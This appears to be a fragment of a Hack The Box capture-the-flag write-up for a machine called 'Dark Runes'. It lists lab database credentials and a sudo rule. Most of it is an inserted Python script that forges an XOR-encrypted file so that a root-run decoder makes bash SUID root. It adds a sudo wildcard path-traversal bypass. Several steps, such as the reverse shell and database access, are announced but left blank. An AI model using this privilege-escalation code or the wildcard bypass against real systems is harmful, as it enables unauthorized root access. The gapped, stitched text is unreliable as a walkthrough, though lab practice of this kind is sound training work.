Machine Difficulty: Medium
Category: Web, Cryptography, Binary Exploitation, Linux
htb dark runes

✅ RCE achieved. Get a reverse shell:

Land in /var/www/darkrunes. Find config.py with PostgreSQL creds: db_user: rune_walker, db_pass: s3cr3t_run3s. Access DB:

User flag: user.txt in /home/admin. Run sudo -l → (root) NOPASSWD: /usr/local/bin/rune_decoder /var/runes/*

It reads a file, XOR-decrypts it with a hardcoded key, then executes the output as a shell command if it starts with RUNECMD:. Create a malicious rune file:
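The "create a malicious rune file" step for the rune_decoder sudo rule, as an added example (this is not the writeup's own script). It models the decoder's logic as the writeup describes it (XOR with a hardcoded key, then run the plaintext as a shell command if it starts with RUNECMD:) and forges a file that decrypts to a chosen command. The key value `d4rkrun3`, the assumption that the key repeats cyclically, the `chmod u+s /bin/bash` payload and the output path are all assumptions: the real key has to be pulled from the binary (strings, ltrace or a disassembler) before this is useful.

```python
#!/usr/bin/env python3
"""Added example: forge a rune file for the XOR-based rune_decoder privesc.

Assumptions not stated in the writeup: the hardcoded XOR key is KEY below
(recover the real one from /usr/local/bin/rune_decoder), the key is applied
cyclically across the file, and the user can write into /var/runes/.
"""
import itertools
import os
import subprocess
from typing import Optional

KEY = b"d4rkrun3"          # assumed key; replace with the value from the binary
PREFIX = b"RUNECMD:"       # marker the decoder checks before executing


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric, so one function encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def forge_rune(command: str, key: bytes = KEY) -> bytes:
    """Ciphertext that the decoder will turn back into 'RUNECMD:<command>'."""
    return xor_bytes(PREFIX + command.encode(), key)


def simulate_decoder(rune: bytes, key: bytes = KEY, run: bool = False) -> Optional[bytes]:
    """Model of the decoder as described: XOR-decrypt, and if the plaintext
    starts with RUNECMD:, hand the remainder to a shell. Returns the command
    it would execute, or None when the prefix check fails."""
    plain = xor_bytes(rune, key)
    if not plain.startswith(PREFIX):
        return None
    cmd = plain[len(PREFIX):]
    if run:  # under the sudo rule the real binary does this as root
        subprocess.run(cmd, shell=True)
    return cmd


if __name__ == "__main__":
    # Assumed payload: make bash SUID-root so a root shell survives via `bash -p`.
    payload = forge_rune("chmod u+s /bin/bash")
    out = os.environ.get("RUNE_OUT", "/var/runes/evil.rune")  # assumed path
    with open(out, "wb") as f:
        f.write(payload)
    print(f"wrote {len(payload)} bytes to {out}; now run:")
    print(f"  sudo /usr/local/bin/rune_decoder {out} && /bin/bash -p")
```

Two checks before firing it: confirm with `simulate_decoder` that the forged bytes decrypt to the intended command under the recovered key (a wrong key yields garbage that fails the RUNECMD: check and the binary does nothing), and confirm the target directory is writable. If /var/runes is not writable, note that sudo matches wildcards in command arguments across `/`, so a path such as /var/runes/../home/admin/evil.rune also satisfies `/var/runes/*`; whether that is needed here depends on the box's permissions, which the writeup does not state.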